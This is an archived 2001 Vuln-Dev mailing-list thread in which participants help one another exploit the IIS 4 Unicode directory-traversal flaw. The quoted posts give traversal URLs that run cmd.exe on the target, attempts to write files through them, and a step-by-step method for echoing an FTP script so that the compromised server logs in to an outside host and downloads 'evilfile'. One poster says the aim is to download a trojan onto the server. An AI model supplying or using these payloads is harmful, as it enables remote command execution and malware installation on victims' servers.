Vulnerability Development mailing list archives
Re: [unicode / iis4]PLEASE HELP ME.
From: Fabrizio Siciliano <fsiciliano () EARTHLINK NET>
Date: Wed, 24 Jan 2001 20:41:52 -0500
Hi everyone... I've noticed alot of these Unicode-type-of-questions. Sure, send me a flame if this question was already on the list, but, let's say I have a word...ummm, "telephone". How do I actually go about finding the unicode equivalent to that? I've looked for converters, but couldn't find any. Can anyone help me out there? THANK YOU ALL! -Fab #-----Original Message----- #From: VULN-DEV List [mailto:VULN-DEV () SECURITYFOCUS COM]On Behalf Of Ryan #Yagatich #Sent: Tuesday, January 09, 2001 12:47 PM #To: VULN-DEV () SECURITYFOCUS COM #Subject: Re: [unicode / iis4] # # #it doesn't matter where the system directory is, or the web directory. (the #whole point of /msdac) #let's assume the following: # #z:\WINDOWS_NT <--system root #u:\internet\web_root <--web root #since the msdac variant comes from program files\(i don't remember #exactly)\msdac you can still execute any commands you please no #matter where #those directories are # # # #ryan # # #-----Original Message----- #From: VULN-DEV List [mailto:VULN-DEV () SECURITYFOCUS COM]On Behalf Of Tim #H #Sent: Monday, January 08, 2001 11:00 AM #To: VULN-DEV () SECURITYFOCUS COM #Subject: Re: [unicode / iis4] # # #Hi All, #A lot of these attacks assume that the web directory is on the #same drive as #the system and that the system is in the winnt directory. If neither if #these conditions are true, is this exploit still reasonable? # #Thanks, #Tim # #-----Original Message----- #From: white hat eagle [mailto:whitehateagle () USA NET] #Sent: Saturday, January 06, 2001 4:32 PM #To: VULN-DEV () SECURITYFOCUS COM #Subject: Re: [unicode / iis4] # # #Hi folks, #in order to download a file by using mdac.pl or mdac2.pl or iis/unicode #exploit you should create a file, say, ftptmp.txt and you should issue #the following command #ftp -n -s:ftptmp.txt #where the -n switch will suppress the interactive logon mode and -s switch #will contain the commands and user credentials. #and the contents of the ftptmp.txt should be #open x.x.x.x [or the name of the ftp server] #user #anonymous #me () hacker com #bin #get evilfile #bye #to create this file you should use the "echo" command and redirect the #content to the file ftptmp.txt as follows #echo open x.x.x.x >ftptmp.txt && echo user >>ftptmp.txt....... #and so on. #good luck, #whe- # #Mad Zigy <zigy () GLOBAL CO ZA> wrote: #Well i have been able to use msadc2.pl yet the #commands i give do not work. so i tried the other way #by doing #http://hostname/scripts/..%c0% #af../winnt/system32/cmd.exe?/c+echo+test+>+c:\test #.txt #and all it did was say: The parameter is incorrect. #so then i though maybe we cant have a > in the string #so i found the hex of it and tried #http://hostname/scripts/..%c0% #af../winnt/system32/cmd.exe?/c+echo+test+% #3e+c:\test.txt #yet it still gave me the same: The parameter is #incorrect. #I have been able to make it ftp into my pc by #http://hostname/scripts/..%c0% #af../winnt/system32/cmd.exe?/c+ftp+hostname #but i cant make it login as i need to echo a script #which i can run http://hostname/scripts/..%c0% #af../winnt/system32/cmd.exe?/c+ftp+- #s:c:\ftp.txt+hostname so that it will login and #download the exe / trojan #Thankz zigy! # # # #_________________________________________________________________ #Get your FREE download of MSN Explorer at http://explorer.msn.com # # #
Current thread:
- Re: [unicode / iis4] white hat eagle (Jan 07)
- <Possible follow-ups>
- Re: [unicode / iis4] Tim H (Jan 08)
- Re: [unicode / iis4] Marco van Berkum (Jan 09)
- Re: [unicode / iis4] Ryan Yagatich (Jan 09)
- Re: [unicode / iis4]PLEASE HELP ME. Fabrizio Siciliano (Jan 24)
- Re: [unicode / iis4] Wertheimer, Ishai (Jan 10)
- Re: [unicode / iis4] Marco van Berkum (Jan 11)
- Re: [unicode / iis4] Wertheimer, Ishai (Jan 11)